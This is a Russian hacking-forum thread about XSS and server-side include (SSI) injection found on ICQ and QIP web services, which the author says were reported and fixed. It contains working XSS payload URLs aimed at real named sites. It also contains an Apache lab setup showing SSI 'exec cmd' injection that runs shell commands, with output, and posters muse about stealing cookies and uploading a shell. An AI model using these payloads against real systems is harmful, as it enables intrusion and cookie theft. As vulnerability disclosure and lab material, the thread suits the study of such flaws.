ANTICHAT - SSI на сервере ICQ

ANTICHAT (https://forum.antichat.xyz/index.php)

- Skype, IRC, ICQ, Jabber и другие IM (https://forum.antichat.xyz/forumdisplay.php?f=13)

- - SSI на сервере ICQ (https://forum.antichat.xyz/showthread.php?t=425762)

Не так давно на сервере people.icq.com изменили форму отображения инфо о уине. Пример:

http://savepic.su/5636998.png

Самая первая мысль, а что если в поле people.icq.com/people// ввести что-то другое?

Попробует выполнить скрипт [B] XSS работает, значит можно воровать кукисы :

http://savepic.su/5651353.png

А может кто-то по ошибке забыл отключить Server Side Include (SSI)? Сервер пашет на nginx. На удачу составим запрос с отображением локального времени :

http://savepic.su/5688216.png

Опачки! Работает!

А адрес сервера покажет?

http://savepic.su/5667736.png

А путь к корню?

http://savepic.su/5647256.png

Так может и шелл можно залить " --> ???...

А это уже совсем другая история....

P.S. На момент написания статьи администрация ICQ уже была оповещена о данной уязвимости и залатала дырку.

(с) alkos

Цитата:

Сообщение от Expl0ited

↑
шелл то хоть залил?

http://savepic.su/5673884.gif

Читал пост ТС и все боялся что он подробно расскажет всем как залить шелл)

Обошлось.

Зла не хватает. Кто то адаптируется, а кто то взламывает.

Ну и в продолжении...

Код:

http://search.qip.ru/search/?query=\x3C\x2Fscript\x3E\x3Cscript\x3Ealert\x28document.domain\x29\x3C\x2Fscript\x3E

http://dl2.joxi.net/drive/0011/0659/...403e31e3e7.jpg

http://search.qip.ru/search/?query=\...OOT\x22+--\x3E

90 строка

http://dl1.joxi.net/drive/0011/0659/...f017ea6010.jpg

Алкос подари 31338))

Цитата:

Сообщение от psihoz26

↑
Алкос подари 31338))

это номер [ e l i T e ] вообще-то, у него спрашивай

странно я думал это анрег.

31338 » 0x05 — REGISTRED…

31338 » 11.01.2013 07:01:33

Предполагаю, что такие вещи актуальны не только для XSS, но и SQL inj, когда результат запроса выводится на страницу, тоесть может быть нечто подобноеSQL inj -> XXS(SIXSS) -> SSI. Только стоит сказать один важный момент, сам nginx хоть и имеет потдержку SSI, но он не умееет запускать внешнюю программу, в отличии от Apache(нагуглил gemaglabin). В Apache SSI реализован через модульmod_include, но для работыexec cmd еще нужно mod_cgi или mod_cgid, а также отключенная директива IncludesNoExec, иначе в контенте на html страничке будет [an error occurred while processing this directive] и в лог ошибок(если включен) будет падать запись:AH01371: unknown directive "exec" in parsed doc.

Код:

sudo mkdir -p /srv/www/vuln_dev/public_html

sudo mkdir /srv/www/vuln_dev/logs

sudo chown $USER: -R  /srv/www/vuln_dev/public_html

sudo nano /etc/apache2/sites-available/vuln-dev.conf



  ServerAdmin vuln@locahost

  ServerName vuln

  DocumentRoot /srv/www/vuln_dev/public_html



  

  AllowOverride All

  Require all granted

  

  ErrorLog /srv/www/vuln_dev/logs/error.log

  LogLevel warn



sudo a2ensite vuln-dev.conf

sudo nano /etc/hosts

127.0.0.1 vuln

sudo nano /etc/apache2/mods-available/userdir.conf

#IncludesNoExec

sudo a2enmod include

sudo a2enmod cgi

sudo service apache2 restart

nano /srv/www/vuln_dev/public_html/.htaсcess

Код:

Options Includes

AddType application/x-httpd-php .html

AddOutputFilter INCLUDES .html

nano /srv/www/vuln_dev/public_html/index.html

Код HTML:



  Тест

Запрос

Код:

 это %3C!--%23exec%20cmd%3D%22ls%22%20--%3E

http://vuln/?t=%3C!--%23exec%20cmd%3D%22ls%20-la%22%20--%3E

Ответ

Код HTML:



  Тест

  



   total 16

drwxr-xr-x 2 omen666 omen666 4096 May 28 04:26 .

drwxr-xr-x 4 root  root  4096 May 28 01:01 ..

-rw-r--r-- 1 omen666 omen666  87 May 28 04:26 .htaccess

-rw-r--r-- 1 omen666 omen666  138 May 28 03:53 index.html

ps все пошла школота хекать )

В продолжение темы. Вместе с Stored XSS на icq.com/chat/* (пост) нашлась также и SSI Inj. Поскольку команда exec cmd не работала, выдавая упомянутое выше [an error occurred while processing this directive], то, по-видимому, залить шелл возможности не имелось.

Fixed.

http://savepic.ru/8712324.png

http://savepic.ru/8692868.png

Poltergeist, забавно. Ничему жизнь не учит.